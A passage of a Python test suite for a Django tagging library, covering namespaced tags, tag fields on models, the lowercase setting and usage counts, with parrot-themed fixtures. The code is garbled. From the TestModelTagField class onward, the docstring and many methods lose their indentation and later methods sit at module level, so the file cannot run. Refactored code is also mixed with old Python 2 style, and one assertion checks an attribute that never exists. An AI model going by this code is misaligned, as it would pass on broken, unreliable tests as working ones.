        tags = self.pining_for_the_fjords_parrot.spam2
        self.assertEqual(len(tags), 0)
        tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(tags), 2)
        self.assertTrue(get_tag('foo') in tags)
        self.assertTrue(get_tag('bar') in tags)
        tags = self.pining_for_the_fjords_parrot.attrs
        self.assertEqual(len(tags), 0)
        # Per the expectations below, 'fly' ends up as 'attr:fly' while
        # 'size:big' (a foreign namespace) is not kept by this descriptor.
        self.pining_for_the_fjords_parrot.attrs = 'fly size:big'
        tags = self.pining_for_the_fjords_parrot.attrs
        self.assertEqual(len(tags), 1)
        self.assertTrue(get_tag('attr:fly') in tags)
        tags = Tag.objects.get_for_object(self.pining_for_the_fjords_parrot)
        self.assertEqual(len(tags), 3)
        for tag_input in ('foo', 'bar', 'attr:fly'):
            self.assertTrue(get_tag(tag_input) in tags)
###########
# Tagging #
###########
class TestBasicTagging(TestCase):
    """Tests for the basic tagging operations ``update_tags`` and
    ``add_tag`` on a single object.

    Fixes: deprecated ``failUnless``/``assertEquals`` aliases, Python
    2-only ``except X, e`` syntax, a loop variable shadowing the ``input``
    builtin, and heavy duplication extracted into two private helpers.
    """
    def setUp(self):
        self.dead_parrot = Parrot.objects.create(state='dead')
    def _assert_tags(self, expected):
        """Assert the dead parrot carries exactly ``len(expected)`` tags
        and that each tag string in ``expected`` resolves to one of them.
        Returns the fetched tags for further checks."""
        tags = Tag.objects.get_for_object(self.dead_parrot)
        self.assertEqual(len(tags), len(expected))
        for tag_input in expected:
            self.assertTrue(get_tag(tag_input) in tags)
        return tags
    def _assert_add_tag_fails(self, tag_input, message, **kwargs):
        """Assert add_tag() raises AttributeError with exactly ``message``;
        any other exception type (or none at all) fails the test."""
        try:
            Tag.objects.add_tag(self.dead_parrot, tag_input, **kwargs)
        except AttributeError as ae:
            self.assertEqual(str(ae), message)
        except Exception as e:
            raise self.failureException('the wrong type of exception was raised: type [%s] value [%s]' %
                (str(type(e)), str(e)))
        else:
            raise self.failureException('an AttributeError exception was supposed to be raised!')
    def test_update_tags(self):
        # Comma- and space-separated inputs, with and without quotes.
        Tag.objects.update_tags(self.dead_parrot, 'foo,bar,"ter"')
        self._assert_tags(['foo', 'bar', 'ter'])
        Tag.objects.update_tags(self.dead_parrot, '"foo" bar "baz"')
        self._assert_tags(['bar', 'baz', 'foo'])
        # A quoted namespace still forms a namespaced tag.
        Tag.objects.update_tags(self.dead_parrot, '"foo":bar "baz"')
        self._assert_tags(['foo:bar', 'baz'])
        Tag.objects.update_tags(self.dead_parrot, '"foo":bar="baz"')
        self._assert_tags(['foo:bar=baz'])
        Tag.objects.update_tags(self.dead_parrot, 'bar="baz"')
        self._assert_tags(['bar=baz'])
    def test_update_tags_with_default_namespace(self):
        Tag.objects.update_tags(self.dead_parrot, 'bar', default_namespace='foo')
        self._assert_tags(['foo:bar'])
        Tag.objects.update_tags(self.dead_parrot, 'bar foo', default_namespace='foo')
        self._assert_tags(['foo:bar', 'foo:foo'])
        Tag.objects.update_tags(self.dead_parrot, 'bar=foo', default_namespace='foo')
        self._assert_tags(['foo:bar=foo'])
        # An explicit empty namespace (':' or '""') overrides the default.
        Tag.objects.update_tags(self.dead_parrot, ':bar', default_namespace='foo')
        tags = self._assert_tags(['bar'])
        self.assertTrue(get_tag('foo:bar') not in tags)
        Tag.objects.update_tags(self.dead_parrot, '"":bar', default_namespace='foo')
        tags = self._assert_tags(['bar'])
        self.assertTrue(get_tag('foo:bar') not in tags)
        Tag.objects.update_tags(self.dead_parrot, 'space:bar foo=value', default_namespace='foo')
        self._assert_tags(['space:bar', 'foo:foo=value'])
        Tag.objects.update_tags(self.dead_parrot, 'foo: foo:foo', default_namespace='foo')
        self._assert_tags(['foo:foo'])
        Tag.objects.update_tags(self.dead_parrot, 'space:"bar foo"=value', default_namespace='foo')
        self._assert_tags(['space:bar foo=value'])
        Tag.objects.update_tags(self.dead_parrot, 'space:bar foo=value, baz ter', default_namespace='foo')
        self._assert_tags(['space:bar foo=value', 'foo:baz ter'])
        # Default namespaces containing ':' or '=' are rendered quoted.
        Tag.objects.update_tags(self.dead_parrot, 'foo bar', default_namespace='col:on')
        self._assert_tags(['"col:on":foo', '"col:on":bar'])
        Tag.objects.update_tags(self.dead_parrot, 'foo bar', default_namespace='spa ce')
        self._assert_tags(['spa ce:foo', 'spa ce:bar'])
        Tag.objects.update_tags(self.dead_parrot, 'foo bar', default_namespace='equ=al')
        self._assert_tags(['"equ=al":foo', '"equ=al":bar'])
        # Whitespace-only input clears all tags.
        Tag.objects.update_tags(self.dead_parrot, ' ', default_namespace='equ=al')
        self._assert_tags([])
    def test_add_tag(self):
        # start off in a known, mildly interesting state
        Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
        self._assert_tags(['bar', 'baz', 'foo'])
        # try to add a tag that already exists
        Tag.objects.add_tag(self.dead_parrot, 'foo')
        self._assert_tags(['bar', 'baz', 'foo'])
        # now add a tag that doesn't already exist
        Tag.objects.add_tag(self.dead_parrot, 'zip')
        self._assert_tags(['zip', 'bar', 'baz', 'foo'])
        # try to add a tag that has the same name of an existing but a
        # different namespace
        Tag.objects.add_tag(self.dead_parrot, 'foo:bar')
        self._assert_tags(['zip', 'bar', 'baz', 'foo', 'foo:bar'])
        # try to add a tag that looks like an already existent namespaced tag
        # but is quoted
        Tag.objects.add_tag(self.dead_parrot, '"foo:bar"')
        self._assert_tags(['zip', 'bar', 'baz', 'foo', 'foo:bar', '"foo:bar"'])
        # now add a tag with namespace that already exists
        Tag.objects.add_tag(self.dead_parrot, 'foo:bar')
        self._assert_tags(['zip', 'bar', 'baz', 'foo', 'foo:bar', '"foo:bar"'])
        # add a tag with namespace and value
        Tag.objects.add_tag(self.dead_parrot, 'foo:bar=baz')
        self._assert_tags(['zip', 'bar', 'baz', 'foo', 'foo:bar', '"foo:bar"',
                           '"foo":"bar"="baz"'])
    def test_add_tag_with_default_namespace(self):
        Tag.objects.add_tag(self.dead_parrot, 'bar')
        self._assert_tags(['bar'])
        Tag.objects.add_tag(self.dead_parrot, 'bar', default_namespace='foo')
        self._assert_tags(['bar', 'foo:bar'])
        # A leading ':' suppresses the default namespace.
        Tag.objects.add_tag(self.dead_parrot, ':baz', default_namespace='foo')
        self._assert_tags(['bar', 'foo:bar', 'baz'])
        Tag.objects.add_tag(self.dead_parrot, 'bar', default_namespace='col:on')
        self._assert_tags(['bar', 'foo:bar', 'baz', '"col:on":bar'])
    def test_add_tag_invalid_input_no_tags_specified(self):
        # start off in a known, mildly interesting state
        Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
        self._assert_tags(['bar', 'baz', 'foo'])
        invalid_input = [' ', ':', '=', ':=']
        for tag_input in invalid_input:
            self._assert_add_tag_fails(tag_input, 'No tags were given: "%s".' % tag_input)
        # The same inputs must also be rejected with a default namespace.
        for tag_input in invalid_input:
            self._assert_add_tag_fails(tag_input, 'No tags were given: "%s".' % tag_input,
                                       default_namespace='foo')
    def test_add_tag_invalid_input_multiple_tags_specified(self):
        # start off in a known, mildly interesting state
        Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
        self._assert_tags(['bar', 'baz', 'foo'])
        self._assert_add_tag_fails('one two', 'Multiple tags were given: "one two".')
    def test_update_tags_exotic_characters(self):
        # start off in a known, mildly interesting state
        Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
        self._assert_tags(['bar', 'baz', 'foo'])
        # Non-ASCII tag names and namespaces must round-trip unchanged.
        Tag.objects.update_tags(self.dead_parrot, u'ŠĐĆŽćžšđ')
        tags = Tag.objects.get_for_object(self.dead_parrot)
        self.assertEqual(len(tags), 1)
        self.assertEqual(unicode(tags[0]), u'ŠĐĆŽćžšđ')
        Tag.objects.update_tags(self.dead_parrot, u'你好')
        tags = Tag.objects.get_for_object(self.dead_parrot)
        self.assertEqual(len(tags), 1)
        self.assertEqual(unicode(tags[0]), u'你好')
        Tag.objects.update_tags(self.dead_parrot, u'ŠĐĆŽćžšđ', default_namespace=u'你好')
        tags = Tag.objects.get_for_object(self.dead_parrot)
        self.assertEqual(len(tags), 1)
        self.assertEqual(unicode(tags[0]), u'你好:ŠĐĆŽćžšđ')
    def test_update_tags_with_none(self):
        # start off in a known, mildly interesting state
        Tag.objects.update_tags(self.dead_parrot, 'foo bar baz')
        self._assert_tags(['bar', 'baz', 'foo'])
        # Passing None removes every tag.
        Tag.objects.update_tags(self.dead_parrot, None)
        self._assert_tags([])
class TestModelTagField(TestCase):
""" Test the 'tags' field on models. """
    def setUp(self):
        # Remember the real stderr so tearDown can restore it after any
        # test in this class that redirects it.
        self.original_stderr = sys.stderr
    def tearDown(self):
        # Undo any stderr redirection performed during the test.
        sys.stderr = self.original_stderr
def test_create_with_tags_specified(self):
f1 = FormTest.objects.create(tags=u'test3 test2 test1 one:"two three"=four')
tags = Tag.objects.get_for_object(f1)
test1_tag = get_tag('test1')
test2_tag = get_tag('test2')
test3_tag = get_tag('test3')
one_tag = get_tag('one:"two three"=four')
self.failUnless(None not in (test1_tag, test2_tag, test3_tag, one_tag))
self.assertEquals(len(tags), 4)
self.failUnless(test1_tag in tags)
self.failUnless(test2_tag in tags)
self.failUnless(test3_tag in tags)
self.failUnless(one_tag in tags)
def test_update_via_tags_field(self):
f1 = FormTest.objects.create(tags=u'test3 test2 test1')
tags = Tag.objects.get_for_object(f1)
test1_tag = get_tag('test1')
test2_tag = get_tag('test2')
test3_tag = get_tag('test3')
self.failUnless(None not in (test1_tag, test2_tag, test3_tag))
self.assertEquals(len(tags), 3)
self.failUnless(test1_tag in tags)
self.failUnless(test2_tag in tags)
self.failUnless(test3_tag in tags)
f1.tags = u'test4'
f1.save()
tags = Tag.objects.get_for_object(f1)
test4_tag = get_tag('test4')
self.assertEquals(len(tags), 1)
self.assertEquals(tags[0], test4_tag)
f1.tags = u'foo:bar'
f1.save()
tags = Tag.objects.get_for_object(f1)
foo_bar_tag = get_tag('foo:bar')
self.assertEquals(len(tags), 1)
self.assertEquals(tags[0], foo_bar_tag)
f1.tags = ''
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
def test_single_tagfield_without_namespace(self):
f1 = FormTest.objects.create(
tags=u'tag1 foo:tag2 :tag3 ""tag""4=value')
tags = Tag.objects.get_for_object(f1)
tag1 = get_tag('tag1')
tag2 = get_tag('foo:tag2')
tag3 = get_tag('tag3')
tag4 = get_tag('tag4=value')
self.failUnless(None not in (tag1, tag2, tag3, tag4))
self.assertEquals(len(tags), 4)
self.failUnless(tag1 in tags)
self.failUnless(tag2 in tags)
self.failUnless(tag3 in tags)
self.failUnless(tag4 in tags)
self.assertEquals(FormTest.tags, u'tag1 tag3 tag4=value foo:tag2')
# Returns the exact input string. Only works if there is one tagfield
# on the model which also must have not a namespace assigned.
self.assertEquals(f1.tags, u'tag1 foo:tag2 :tag3 ""tag""4=value')
f1.tags = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
self.assertEquals(f1.tags, u'')
f1.tags = u'tag3 foo:tag2'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 2)
self.failUnless(tag2 in tags)
self.failUnless(tag3 in tags)
f1 = FormTest.objects.get(pk=f1.pk)
self.assertEquals(f1.tags, u'tag3 foo:tag2')
self.assertEquals(FormTest.tags, u'tag3 foo:tag2')
def test_tagfield_with_namespace(self):
f1 = DefaultNamespaceTest.objects.create(
categories=u'cat1 :cat2 category:cat3 foo:cat4')
tags = Tag.objects.get_for_object(f1)
cat1 = get_tag('category:cat1')
cat2 = get_tag('cat2')
cat3 = get_tag('category:cat3')
cat4 = get_tag('foo:cat4')
self.failUnless(None not in (cat1, cat3))
self.failUnless(None is cat2)
self.failUnless(None is cat4)
self.assertEquals(len(tags), 2)
self.failUnless(cat1 in tags)
self.failUnless(cat3 in tags)
# not all tags of this model are shown
self.assertEquals(DefaultNamespaceTest.categories, u'cat1 cat3')
tag1 = Tag.objects.create(name='tag1')
Tag.objects.add_tag(f1, unicode(tag1))
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 3)
self.failUnless(cat1 in tags)
self.failUnless(cat3 in tags)
self.failUnless(tag1 in tags)
# not all tags of this model are shown
self.assertEquals(DefaultNamespaceTest.categories, u'cat1 cat3')
f1 = DefaultNamespaceTest.objects.get(pk=f1.pk)
self.assertEquals(f1.categories, u'cat1 cat3')
f1.categories = u'cat1'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 2)
self.failUnless(cat1 in tags)
self.failUnless(tag1 in tags)
f1.categories = u':cat2'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(tag1 in tags)
f1.categories = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(tag1 in tags)
f2 = DefaultNamespaceTest.objects.create()
self.assertEquals(f2.categories, u'')
f2.categories = 'cat5'
f2.save()
tags = Tag.objects.get_for_object(f2)
cat5 = get_tag('category:cat5')
self.assertEquals(len(tags), 1)
self.failUnless(cat5 in tags)
f1 = DefaultNamespaceTest.objects.get(pk=f1.pk)
f2 = DefaultNamespaceTest.objects.get(pk=f2.pk)
self.assertEquals(f1.categories, u'')
self.assertEquals(f2.categories, u'cat5')
self.assertEquals(DefaultNamespaceTest.categories, u'cat5')
def test_tagfield_and_tagfield_with_namespace(self):
f1 = DefaultNamespaceTest2.objects.create(
tags=u'tag1 :tag2 category:tag3 foo:tag4',
categories=u'cat1 :cat2 category:cat3 foo:cat4')
tags = Tag.objects.get_for_object(f1)
tag1 = get_tag('tag1')
tag2 = get_tag('tag2')
tag3 = get_tag('category:tag3')
tag4 = get_tag('foo:tag4')
cat1 = get_tag('category:cat1')
cat2 = get_tag('cat2')
cat3 = get_tag('category:cat3')
cat4 = get_tag('foo:cat4')
self.failUnless(None not in (tag1, tag2, tag4, cat1, cat3))
self.failUnless(tag3 is None)
self.failUnless(cat2 is None)
self.failUnless(cat4 is None)
self.assertEquals(len(tags), 5)
self.failUnless(tag1 in tags)
self.failUnless(tag2 in tags)
self.failUnless(tag4 in tags)
self.failUnless(cat1 in tags)
self.failUnless(cat3 in tags)
self.assertEquals(DefaultNamespaceTest2.tags, u'tag1 tag2 foo:tag4')
self.assertEquals(DefaultNamespaceTest2.categories, u'cat1 cat3')
f1 = DefaultNamespaceTest2.objects.get(pk=f1.pk)
self.assertEquals(f1.tags, u'foo:tag4 tag1 tag2')
self.assertEquals(f1.categories, u'cat1 cat3')
f1.tags = u'tag1'
f1.categories = u'cat1'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 2)
self.failUnless(tag1 in tags)
self.failUnless(cat1 in tags)
self.assertEquals(f1.tags, u'tag1')
self.assertEquals(f1.categories, u'cat1')
f1.tags = u'category:cat1'
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(cat1 in tags)
self.assertEquals(f1.tags, u'')
self.assertEquals(f1.categories, u'cat1')
f1.tags = u'cat2'
f1.categories = u':cat2'
f1.save()
cat2 = get_tag('cat2')
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 1)
self.failUnless(cat2 in tags)
self.assertEquals(f1.tags, u'cat2')
self.assertEquals(f1.categories, u'')
f1.tags = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
self.assertEquals(f1.tags, u'')
self.assertEquals(f1.categories, u'')
# Now its gone.
f1.tags = None
f1.categories = None
f1.save()
tags = Tag.objects.get_for_object(f1)
self.assertEquals(len(tags), 0)
self.assertEquals(f1.tags, u'')
self.assertEquals(f1.categories, u'')
f2 = DefaultNamespaceTest2.objects.create()
self.assertEquals(f2.tags, u'')
self.assertEquals(f2.categories, u'')
f2.tags = 'tag5'
f2.categories = 'cat5'
f2.save()
tags = Tag.objects.get_for_object(f2)
tag5 = get_tag('tag5')
cat5 = get_tag('category:cat5')
self.assertEquals(len(tags), 2)
self.failUnless(tag5 in tags)
self.failUnless(cat5 in tags)
f1 = DefaultNamespaceTest2.objects.get(pk=f1.pk)
f2 = DefaultNamespaceTest2.objects.get(pk=f2.pk)
self.assertEquals(f1.tags, u'')
self.assertEquals(f1.categories, u'')
self.assertEquals(f2.tags, u'tag5')
self.assertEquals(f2.categories, u'cat5')
self.assertEquals(DefaultNamespaceTest2.tags, u'tag5')
self.assertEquals(DefaultNamespaceTest2.categories, u'cat5')
def test_multiple_tagfields_with_namespace(self):
    """Two TagFields with different default namespaces ('foo' and
    'category') on one model: each field only keeps tags whose
    namespace matches its own default; other namespaces are dropped.
    """
    f1 = DefaultNamespaceTest3.objects.create(
        foos=u'foo1 :foo2 category:foo3 foo:foo4',
        categories=u'cat1 :cat2 category:cat3 foo:cat4')
    tags = Tag.objects.get_for_object(f1)
    foo1 = get_tag('foo:foo1')
    foo2 = get_tag('foo2')
    foo3 = get_tag('category:foo3')
    foo4 = get_tag('foo:foo4')
    cat1 = get_tag('category:cat1')
    cat2 = get_tag('cat2')
    cat3 = get_tag('category:cat3')
    cat4 = get_tag('foo:cat4')
    # Only tags matching each field's own namespace were created ...
    self.failUnless(None not in (foo1, foo4, cat1, cat3))
    # ... while explicit-empty (':name') and foreign namespaces were dropped.
    self.failUnless(foo2 is None)
    self.failUnless(foo3 is None)
    self.failUnless(cat2 is None)
    self.failUnless(cat4 is None)
    self.assertEquals(len(tags), 4)
    self.failUnless(foo1 in tags)
    self.failUnless(foo4 in tags)
    self.failUnless(cat1 in tags)
    self.failUnless(cat3 in tags)
    # NOTE(review): class-level access appears to return the edit string of
    # all tags used for this model in the field's namespace, rendered
    # without the namespace prefix -- confirm against the field descriptor.
    self.assertEquals(DefaultNamespaceTest3.foos, u'foo1 foo4')
    self.assertEquals(DefaultNamespaceTest3.categories, u'cat1 cat3')
    f1 = DefaultNamespaceTest3.objects.get(pk=f1.pk)
    self.assertEquals(f1.foos, u'foo1 foo4')
    self.assertEquals(f1.categories, u'cat1 cat3')
    # Narrow both fields to a single tag each.
    f1.foos = u'foo1'
    f1.categories = u'cat1'
    f1.save()
    tags = Tag.objects.get_for_object(f1)
    self.assertEquals(len(tags), 2)
    self.failUnless(foo1 in tags)
    self.failUnless(cat1 in tags)
    self.assertEquals(f1.foos, u'foo1')
    self.assertEquals(f1.categories, u'cat1')
    # Assigning a 'category:' tag through the foos field does not put it
    # into foos; the categories field keeps its tag.
    f1.foos = u'category:cat1'
    f1.save()
    tags = Tag.objects.get_for_object(f1)
    self.assertEquals(len(tags), 1)
    self.failUnless(cat1 in tags)
    self.assertEquals(f1.foos, u'')
    self.assertEquals(f1.categories, u'cat1')
    # A bare name set on foos gets the 'foo' namespace; ':cat2' forces an
    # empty namespace and is therefore dropped from categories.
    f1.foos = u'cat4'
    f1.categories = u':cat2'
    f1.save()
    cat4 = get_tag('foo:cat4')
    tags = Tag.objects.get_for_object(f1)
    self.assertEquals(len(tags), 1)
    self.failUnless(cat4 in tags)
    self.assertEquals(f1.foos, u'cat4')
    self.assertEquals(f1.categories, u'')
    # None clears a field just like an empty string would.
    f1.foos = None
    f1.save()
    tags = Tag.objects.get_for_object(f1)
    self.assertEquals(len(tags), 0)
    self.assertEquals(f1.foos, u'')
    self.assertEquals(f1.categories, u'')
    # Clearing already-empty fields is a no-op.
    f1.foos = None
    f1.categories = None
    f1.save()
    tags = Tag.objects.get_for_object(f1)
    self.assertEquals(len(tags), 0)
    self.assertEquals(f1.foos, u'')
    self.assertEquals(f1.categories, u'')
    # A second instance gets its own independent tags.
    f2 = DefaultNamespaceTest3.objects.create()
    self.assertEquals(f2.foos, u'')
    self.assertEquals(f2.categories, u'')
    f2.foos = 'foo5'
    f2.categories = 'cat5'
    f2.save()
    tags = Tag.objects.get_for_object(f2)
    foo5 = get_tag('foo:foo5')
    cat5 = get_tag('category:cat5')
    self.assertEquals(len(tags), 2)
    self.failUnless(foo5 in tags)
    self.failUnless(cat5 in tags)
    f1 = DefaultNamespaceTest3.objects.get(pk=f1.pk)
    f2 = DefaultNamespaceTest3.objects.get(pk=f2.pk)
    self.assertEquals(f1.foos, u'')
    self.assertEquals(f1.categories, u'')
    self.assertEquals(f2.foos, u'foo5')
    self.assertEquals(f2.categories, u'cat5')
    # Only f2's tags remain model-wide at this point.
    self.assertEquals(DefaultNamespaceTest3.foos, u'foo5')
    self.assertEquals(DefaultNamespaceTest3.categories, u'cat5')
def test_model_tag_field_definition_validation(self):
    """Defining two TagFields with the same namespace on one model must
    abort: the field validation writes an error to stderr and raises
    SystemExit.

    Fixes: the original replaced sys.stderr with a StringIO and never
    restored it, silencing error output for every later test in the run.
    """
    from StringIO import StringIO
    from tagging.fields import TagField
    original_stderr = sys.stderr
    # Silence the validation error message the field writes to stderr.
    sys.stderr = StringIO()
    try:
        try:
            class Model(models.Model):
                tags = TagField(namespace='foo')
                foos = TagField(namespace='foo')
        # 'except SystemExit:' (no binding) -- the exception object was
        # never used, and this spelling is valid on both Python 2 and 3.
        except SystemExit:
            pass
        else:
            self.fail(
                u'Validation of model fields failed. '
                u'A namespace is only allowed once. '
            )
    finally:
        # Always restore stderr so later tests see real error output.
        sys.stderr = original_stderr
def test_update_via_tags(self):
    """Deleting or renaming a Tag directly is reflected in the model's
    tag field string on reload.
    """
    instance = FormTest.objects.create(tags=u'one two three')
    # Drop one tag entirely and rename another on the Tag model itself.
    Tag.objects.get(name='three').delete()
    renamed = Tag.objects.get(name='two')
    renamed.name = 'new'
    renamed.save()
    reloaded = FormTest.objects.get(pk=instance.pk)
    for old_name in ('three', 'two'):
        self.failIf(old_name in reloaded.tags)
    self.failUnless('new' in reloaded.tags)
def test_creation_without_specifying_tags(self):
    """An instance constructed without tags has an empty tag string."""
    instance = FormTest()
    self.assertEquals(instance.tags, '')
def test_creation_with_nullable_tags_field(self):
    """A nullable TagField also defaults to the empty string."""
    instance = FormTestNull()
    self.assertEquals(instance.tags, '')
class TestSettings(TestCase):
    """Tests for the FORCE_LOWERCASE_TAGS setting."""
    def setUp(self):
        # Save the global setting so tearDown can undo any change.
        self.original_force_lower_case_tags = conf.FORCE_LOWERCASE_TAGS
        self.dead_parrot = Parrot.objects.create(state='dead')
    def tearDown(self):
        # Restore the setting modified by the tests.
        conf.FORCE_LOWERCASE_TAGS = self.original_force_lower_case_tags
    def test_force_lowercase_tags(self):
        """ Test forcing tags to lowercase. """
        conf.FORCE_LOWERCASE_TAGS = True
        # Mixed-case input must be stored lowercased.
        Tag.objects.update_tags(self.dead_parrot, 'foO bAr Ter')
        tags = Tag.objects.get_for_object(self.dead_parrot)
        self.assertEquals(len(tags), 3)
        foo_tag = get_tag('foo')
        bar_tag = get_tag('bar')
        ter_tag = get_tag('ter')
        self.failUnless(foo_tag in tags)
        self.failUnless(bar_tag in tags)
        self.failUnless(ter_tag in tags)
        # Updating replaces 'ter' with 'baz'; the count stays at three.
        Tag.objects.update_tags(self.dead_parrot, 'foO bAr baZ')
        tags = Tag.objects.get_for_object(self.dead_parrot)
        baz_tag = get_tag('baz')
        self.assertEquals(len(tags), 3)
        self.failUnless(bar_tag in tags)
        self.failUnless(baz_tag in tags)
        self.failUnless(foo_tag in tags)
        # Adding an upper-case variant of an existing tag is a no-op.
        Tag.objects.add_tag(self.dead_parrot, 'FOO')
        tags = Tag.objects.get_for_object(self.dead_parrot)
        self.assertEquals(len(tags), 3)
        self.failUnless(bar_tag in tags)
        self.failUnless(baz_tag in tags)
        self.failUnless(foo_tag in tags)
        Tag.objects.add_tag(self.dead_parrot, 'Zip')
        tags = Tag.objects.get_for_object(self.dead_parrot)
        self.assertEquals(len(tags), 4)
        zip_tag = get_tag('zip')
        self.failUnless(bar_tag in tags)
        self.failUnless(baz_tag in tags)
        self.failUnless(foo_tag in tags)
        self.failUnless(zip_tag in tags)
        # Namespace, name and value parts are all lowercased.
        Tag.objects.add_tag(self.dead_parrot, 'Foo:bAr=ziP')
        tags = Tag.objects.get_for_object(self.dead_parrot)
        self.assertEquals(len(tags), 5)
        foo_bar_zip_tag = get_tag('foo:bar=zip')
        self.failUnless(bar_tag in tags)
        self.failUnless(baz_tag in tags)
        self.failUnless(foo_tag in tags)
        self.failUnless(zip_tag in tags)
        self.failUnless(foo_bar_zip_tag in tags)
        # The model TagField honours the setting as well.
        f1 = FormTest.objects.create()
        f1.tags = u'TEST5'
        f1.save()
        tags = Tag.objects.get_for_object(f1)
        test5_tag = get_tag('test5')
        self.assertEquals(len(tags), 1)
        self.failUnless(test5_tag in tags)
        self.assertEquals(f1.tags, u'test5')
        f1.tags = u'TEST5 FOO:BAR=TAR'
        f1.save()
        tags = Tag.objects.get_for_object(f1)
        foo_bar_tar_tag = get_tag('foo:bar=tar')
        self.assertEquals(len(tags), 2)
        self.failUnless(test5_tag in tags)
        self.failUnless(foo_bar_tar_tag in tags)
        self.assertEquals(f1.tags, u'test5 foo:bar=tar')
class TestTagUsageForModelBaseCase(TestCase):
    """usage_for_model() on a model with no tagged instances."""
    def test_tag_usage_for_model_empty(self):
        # No parrots have been tagged, so usage must be an empty list.
        usage = Tag.objects.usage_for_model(Parrot)
        self.assertEquals(usage, [])
class TestTagUsageForModel(TestCase):
    """Tests for Tag.objects.usage_for_model()."""
    def setUp(self):
        # Fixtures: (state, perch size, perch smelly, tag string).
        parrot_details = (
            ('pining for the fjords', 9, True, 'foo bar foo:bar=egg'),
            ('passed on', 6, False, 'bar baz ter'),
            ('no more', 4, True, 'foo ter foo:bar=egg'),
            ('late', 2, False, 'bar ter foo:bar'),
        )
        for state, perch_size, perch_smelly, tags in parrot_details:
            perch = Perch.objects.create(size=perch_size, smelly=perch_smelly)
            parrot = Parrot.objects.create(state=state, perch=perch)
            Tag.objects.update_tags(parrot, tags)
    def test_tag_usage_for_model(self):
        # counts=True annotates every tag with its usage count.
        tag_usage = Tag.objects.usage_for_model(Parrot, counts=True)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 6)
        self.failUnless((u'bar', 3) in relevant_attribute_list)
        self.failUnless((u'baz', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 2) in relevant_attribute_list)
        self.failUnless((u'ter', 3) in relevant_attribute_list)
        self.failUnless((u'foo:bar=egg', 2) in relevant_attribute_list)
        self.failUnless((u'foo:bar', 1) in relevant_attribute_list)
    def test_tag_usage_for_model_with_min_count(self):
        # min_count drops tags used fewer than that many times.
        tag_usage = Tag.objects.usage_for_model(Parrot, min_count = 2)
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 4)
        self.failUnless((u'bar', 3) in relevant_attribute_list)
        self.failUnless((u'foo', 2) in relevant_attribute_list)
        self.failUnless((u'ter', 3) in relevant_attribute_list)
        self.failUnless((u'foo:bar=egg', 2) in relevant_attribute_list)
    def test_tag_usage_with_filter_on_model_objects(self):
        # filters restricts counting to matching model instances.
        tag_usage = Tag.objects.usage_for_model(Parrot, counts=True, filters=dict(state='no more'))
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 3)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'foo:bar=egg', 1) in relevant_attribute_list)
        tag_usage = Tag.objects.usage_for_model(Parrot, counts=True, filters=dict(state__startswith='p'))
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', 2) in relevant_attribute_list)
        self.failUnless((u'baz', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'foo:bar=egg', 1) in relevant_attribute_list)
        # Filters may span relations.
        tag_usage = Tag.objects.usage_for_model(Parrot, counts=True, filters=dict(perch__size__gt=4))
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', 2) in relevant_attribute_list)
        self.failUnless((u'baz', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 1) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'foo:bar=egg', 1) in relevant_attribute_list)
        tag_usage = Tag.objects.usage_for_model(Parrot, counts=True, filters=dict(perch__smelly=True))
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 4)
        self.failUnless((u'bar', 1) in relevant_attribute_list)
        self.failUnless((u'foo', 2) in relevant_attribute_list)
        self.failUnless((u'ter', 1) in relevant_attribute_list)
        self.failUnless((u'foo:bar=egg', 2) in relevant_attribute_list)
        # min_count combines with filters.
        tag_usage = Tag.objects.usage_for_model(Parrot, min_count=2, filters=dict(perch__smelly=True))
        relevant_attribute_list = [(unicode(tag), tag.count) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 2)
        self.failUnless((u'foo', 2) in relevant_attribute_list)
        self.failUnless((u'foo:bar=egg', 2) in relevant_attribute_list)
        # Without counts/min_count no count attribute is attached
        # (hasattr checks 'counts', which never exists either way).
        tag_usage = Tag.objects.usage_for_model(Parrot, filters=dict(perch__size__gt=4))
        relevant_attribute_list = [(unicode(tag), hasattr(tag, 'counts')) for tag in tag_usage]
        self.assertEquals(len(relevant_attribute_list), 5)
        self.failUnless((u'bar', False) in relevant_attribute_list)
        self.failUnless((u'baz', False) in relevant_attribute_list)
        self.failUnless((u'foo', False) in relevant_attribute_list)
